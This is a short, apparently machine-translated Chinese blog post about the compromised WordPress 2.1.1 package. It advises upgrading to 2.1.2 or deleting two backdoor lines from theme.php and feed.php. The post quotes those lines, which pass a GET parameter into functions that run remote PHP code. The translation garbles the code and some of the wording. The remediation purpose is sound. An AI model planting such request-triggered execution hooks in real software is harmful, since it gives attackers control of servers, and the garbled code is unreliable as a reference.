WordPress的2.1.1是危险的!
以下是如何队WordPress的界定了最新版本的可湿性粉剂。 原因很简单:前几天一裂解装置违反了一些服务器worpress.org ,管理改变安装包通常是下载了:变化似乎只涉及几个文件,允许远程执行PHP代码。 要解决这个问题,有两个备选方案:
- 1 。 下载2.1.2版及时发布的WordPress的开发和升级。
2 。 手工删除的恶意代码(如果像我这样的您不希望/时间来安装新版本) 。
这只不过是:
-识别并删除该文件“ w p-includes/theme.php”下面的代码行:
如果( $ _GET [ “频率” ] ) ( get_theme_mcommand ( $ _GET [ “频率"]);) -识别并删除该文件“ w p-includes/feed.php”下面的代码行:
如果( $ _GET [ '九大' ] ) ( comment_text_phpfilter ( $ _GET [ '九']);)  |
文章有关“ WordPress的2.1.1是危险的! ”
仍然没有任何评论'
发表评论
关闭
- 社会网络
- 发送电子邮件